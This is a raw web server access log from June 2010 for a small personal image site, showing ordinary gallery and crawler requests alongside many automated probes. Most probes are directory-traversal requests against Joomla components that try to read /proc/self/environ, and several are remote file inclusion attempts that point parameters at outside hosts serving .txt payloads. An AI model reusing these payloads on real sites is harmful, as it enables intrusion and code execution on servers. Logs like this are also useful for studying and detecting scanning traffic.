118.137.14.152 - - [21/Jun/2010:03:14:13 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:13 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:14 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:14 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:14 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:16 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:16 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:17 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:18 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:18 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:53 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:54 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:54 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:54 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:54 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:54 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:55 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
118.137.14.152 - - [21/Jun/2010:03:14:56 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
216.127.70.140 - - [21/Jun/2010:03:15:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:15:14 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:03:15:14 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
174.142.75.205 - - [21/Jun/2010:03:19:46 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.142.75.205 - - [21/Jun/2010:03:19:46 -0500] "GET /logs/access_log.1212451200//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
174.142.75.205 - - [21/Jun/2010:03:19:46 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.43.194.164 - - [21/Jun/2010:03:23:59 -0500] "GET /logs/access_log.1274572800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.222.18.143 - - [21/Jun/2010:03:25:19 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:26:36 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.46.204.14 - - [21/Jun/2010:03:27:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.14 - - [21/Jun/2010:03:27:56 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [21/Jun/2010:03:29:47 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.222.18.143 - - [21/Jun/2010:03:29:51 -0500] "GET /logs/access_log.1274572800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:29:51 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:29:51 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.127.70.140 - - [21/Jun/2010:03:30:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.222.18.143 - - [21/Jun/2010:03:31:49 -0500] "GET /logs/access_log.1274572800/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:31:49 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:31:50 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.26.139.67 - - [21/Jun/2010:03:39:35 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
207.46.199.199 - - [21/Jun/2010:03:40:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [21/Jun/2010:03:40:27 -0500] "GET /logs/access_log.1213056000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.199.14.40 - - [21/Jun/2010:03:41:38 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:41:38 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.26.139.67 - - [21/Jun/2010:03:45:29 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.820"
216.26.139.67 - - [21/Jun/2010:03:45:29 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
216.26.139.67 - - [21/Jun/2010:03:45:30 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
216.26.139.67 - - [21/Jun/2010:03:46:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.820"
121.199.14.40 - - [21/Jun/2010:03:47:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:47:24 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:47:24 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.4.232.155 - - [21/Jun/2010:03:47:53 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:03:47:53 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
206.123.118.132 - - [21/Jun/2010:03:48:00 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:00 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:00 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:01 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:01 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:01 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.37.19.40 - - [21/Jun/2010:03:48:04 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.4.232.155 - - [21/Jun/2010:03:48:05 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
206.123.118.132 - - [21/Jun/2010:03:48:09 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:03:48:14 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
121.199.14.40 - - [21/Jun/2010:03:48:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:48:16 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:48:17 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
121.199.14.40 - - [21/Jun/2010:03:48:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
69.4.232.155 - - [21/Jun/2010:03:48:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.37.19.40 - - [21/Jun/2010:03:48:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:03:49:09 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:49:11 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:49:16 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
121.199.14.40 - - [21/Jun/2010:03:49:23 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
114.108.128.56 - - [21/Jun/2010:03:50:11 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
207.46.204.237 - - [21/Jun/2010:03:50:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.237 - - [21/Jun/2010:03:51:10 -0500] "GET /logs/access_log.1242518400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.92.165.130 - - [21/Jun/2010:03:52:06 -0500] "GET /logs/access_log.1274572800%20%20/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:52:06 -0500] "GET /?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:52:07 -0500] "GET /logs/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 200 10344 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:52:26 -0500] "GET /logs/access_log.1274572800/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.18.143 - - [21/Jun/2010:03:52:41 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
114.108.128.56 - - [21/Jun/2010:03:53:02 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:02 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:03 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:27 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:28 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:28 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:30 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:30 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:31 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:33 -0500] "GET /logs/access_log.1274832000/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:33 -0500] "GET /?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:03:53:34 -0500] "GET /logs/?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.79"
208.92.165.130 - - [21/Jun/2010:03:54:40 -0500] "GET /?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:54:40 -0500] "GET /logs/access_log.1274572800%20%20/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:54:40 -0500] "GET /logs/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 200 10344 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:03:54:50 -0500] "GET /logs/access_log.1274572800/?option=com_jeformcr&view=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.208.42 - - [21/Jun/2010:03:54:51 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:03:54:51 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.19.4.18 - - [21/Jun/2010:03:55:53 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:03:55:56 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:03:55:56 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:03:55:57 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:03:56:21 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:03:56:21 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:03:56:21 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
211.43.212.49 - - [21/Jun/2010:03:57:21 -0500] "GET /logs/access_log.1274227200//include/bbs.lib.inc.php?site_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.822"
211.43.212.49 - - [21/Jun/2010:03:57:21 -0500] "GET //include/bbs.lib.inc.php?site_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.822"
211.43.212.49 - - [21/Jun/2010:03:57:22 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.822"
67.222.18.143 - - [21/Jun/2010:03:58:05 -0500] "GET /logs/access_log.1274572800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:58:05 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:03:58:05 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.13.134 - - [21/Jun/2010:04:01:42 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.123.118.132 - - [21/Jun/2010:04:04:27 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:27 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:27 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:42 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:42 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:42 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:52 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:52 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:52 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:04:59 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:05:08 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:05:08 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:04:05:08 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
